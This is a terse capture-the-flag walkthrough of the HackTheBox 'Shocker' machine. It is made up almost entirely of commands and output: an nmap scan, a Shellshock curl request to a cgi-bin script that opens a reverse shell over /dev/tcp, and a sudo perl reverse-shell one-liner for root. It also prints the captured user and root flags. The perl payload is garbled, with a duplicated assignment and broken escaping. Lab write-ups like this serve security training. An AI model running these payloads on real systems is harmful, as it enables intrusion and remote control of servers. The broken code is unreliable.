HackTheBox Shocker

$ nmap -sV -sC -Pn -oN 10.10.10.56 10.10.10.56

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

$ dirbuster http://10.10.10.56 => /cgi-bin/
# stop scan and then scan /cgi-bin/ folder with common extensions: php,py,sh

nc -lnvp 1234
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'" http://10.10.10.56/cgi-bin/user.sh

shelly@Shocker:/home/shelly$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b9:cb:99 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.56/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:cb99/64 scope global mngtmpaddr dynamic
valid_lft 86208sec preferred_lft 14208sec
inet6 fe80::250:56ff:feb9:cb99/64 scope link
valid_lft forever preferred_lft forever
shelly@Shocker:/home/shelly$ cat user.txt
6ee59368c5520458bf269260fac2a54d

nc -lnvp 1235

sudo -l # можем выполнять perl под sudo
sudo perl -e 'use Socket;i="10.10.14.8";i="10.10.14.8";p=1235;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(p,inet\_aton(p,inet_aton(i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

root@Shocker:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:b9:cb:99 brd ff:ff:ff:ff:ff:ff
inet 10.10.10.56/24 brd 10.10.10.255 scope global ens33
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:cb99/64 scope global mngtmpaddr dynamic
valid_lft 86060sec preferred_lft 14060sec
inet6 fe80::250:56ff:feb9:cb99/64 scope link
valid_lft forever preferred_lft forever
root@Shocker:~# cat root.txt
4977ae2439f875b71ce34dd013a8a178